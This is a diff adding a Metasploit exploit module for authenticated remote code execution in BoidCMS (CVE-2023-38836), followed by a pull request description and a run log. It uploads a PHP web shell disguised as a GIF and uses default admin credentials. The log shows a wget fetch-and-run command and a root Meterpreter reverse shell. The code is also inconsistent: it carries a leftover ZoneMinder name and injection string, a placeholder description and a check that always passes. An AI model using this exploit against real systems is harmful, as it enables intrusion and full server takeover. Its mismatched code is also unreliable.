+++ b/modules/exploits/multi/http/cve_2023_38836_boidcms.rb
@@ -1,0 +1,170 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+#
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Exploit::Remote::AutoCheck
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'ZoneMinder Snapshots Command Injection',
+        'Description' => %q{
+          TBA
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          '1337kid',    # Discovery
+          'bwatters-r7' # Metasploit Module
+        ],
+        'References' => [
+          [ 'CVE', '2023-38836' ],
+          [ 'URL', 'https://github.com/1337kid/CVE-2023-38836']
+        ],
+        'Privileged' => false,
+        'Platform' => ['linux', 'unix'],
+        'Targets' => [
+          [
+            'nix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
+                'FETCH_WRITABLE_DIR' => '/tmp'
+              }
+            }
+          ],
+          [
+            'Linux (Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' },
+              'Type' => :linux_dropper
+            }
+          ],
+        ],
+        'CmdStagerFlavor' => [ 'bourne', 'curl', 'wget', 'printf', 'echo' ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2023-02-24',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+                       OptString.new('TARGETURI', [true, 'The path', '/admin'])
+                     ])
+    @token = nil
+  end
+
+  def check
+    Exploit::CheckCode::Appears('Yay')
+  end
+
+  def execute_command(cmd, _opts = {})
+    command = Rex::Text.uri_encode(cmd)
+    print_status('Sending payload')
+    data = "view=snapshot&action=create&monitor_ids[0][Id]=;#{command}"
+    data += "&__csrf_magic=#{@csrf_magic}" if @csrf_magic
+    send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'index.php'),
+      'method' => 'POST',
+      'data' => data.to_s
+    )
+    print_good('Payload sent')
+  end
+
+  def extract_token(res)
+    token = nil
+    if res && res.code == 200
+      token = res.get_html_document.xpath("//input[@name='token']/@value").first
+    end
+    token
+  end
+
+  def exploit
+    # initial login
+    vprint_status('Getting Logon Token')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+    login_token = extract_token(res)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve login token') if login_token.nil?
+
+    login_data =
+      {
+        'username': 'admin',
+        'password': 'password',
+        'login': 'Login',
+        'token': login_token.to_s
+      }
+
+    vprint_status('Logging in')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin'),
+      'method' => 'POST',
+      'keep_cookies' => true,
+      'data' => login_data.to_json
+    )
+
+    vprint_status('Getting Media Token')
+    # get media upload token
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+    media_token = extract_token(res)
+    fail_with(Failure::UnexpectedReply, 'Failed to retrieve login token') if media_token.nil?
+    vprint_status("Media token = #{media_token}")
+
+    upload_data =
+      {
+        'token': media_token.to_s,
+        'upload': 'Upload'
+      }
+
+    # upload file
+    vprint_status('Uploading PHP')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'admin?page=media'),
+      'method' => 'POST',
+      'data' => upload_data.to_json,
+      'files' => 'GIF89a;\n<?php system($_GET["id"]) ?>',
+      'keep_cookies' => true
+    )
+
+    # retrieve output
+    vprint_status('Checking result')
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, '/media/shell.php'),
+      'method' => 'GET',
+      'keep_cookies' => true
+    )
+
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    end
+  end
+
+end


### PR DESCRIPTION
This now works on both Linux and Windows.
This is an authenticated RCE against BoidCMS versions 2.0.0 and earlier.  The underlying issue is that the file upload check allows a php file to be uploaded and executes as a media file if the `GIF` header is present in the PHP file.

## Verification 
- [ ] `use exploit/multi/http/cve_2023_38836_boidcms`
- [ ] `set RHOST <rhost>`
- [ ] `set RPORT <rport>`
- [ ] `set TARGET <target>`
- [ ] `set payload <payload>`
- [ ] `set LHOST <lhost>`

```
msf6 exploit(multi/http/cve_2023_38836_boidcms) > show options
Module options (exploit/multi/http/cve_2023_38836_boidcms):
   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   CMS_PASSWORD  password         yes       Password
   CMS_USERNAME  admin            yes       Username
   PHP_FILENAME  eI1lHLx.php      yes       The name for the php file to upload
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.5.134.129     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-
                                            metasploit.html
   RPORT         8080             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                      yes       The path
   VHOST                          no        HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       WGET             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      LZfjvRRrNR       no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   nix Command
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/cve_2023_38836_boidcms) > run
[*] Command to run on remote host: wget -qO /tmp/oEsnOArk http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/oEsnOArk; /tmp/oEsnOArk &
[*] Fetch Handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. Detected BoidCMS, but the version is unknown.
[*] Getting Token
[*] Logging into CMS
[*] Uploading PHP file eI1lHLx.php
[*] launching Payload
[*] Client 10.5.134.129 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.134.129 (Wget/1.21.2)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.134.129
[+] Deleted eI1lHLx.php
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.134.129:49168) at 2024-02-16 16:32:33 -0600
meterpreter > sysinfo
Computer     : 10.5.134.129
OS           : Ubuntu 22.04 (Linux 6.5.0-17-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > 

```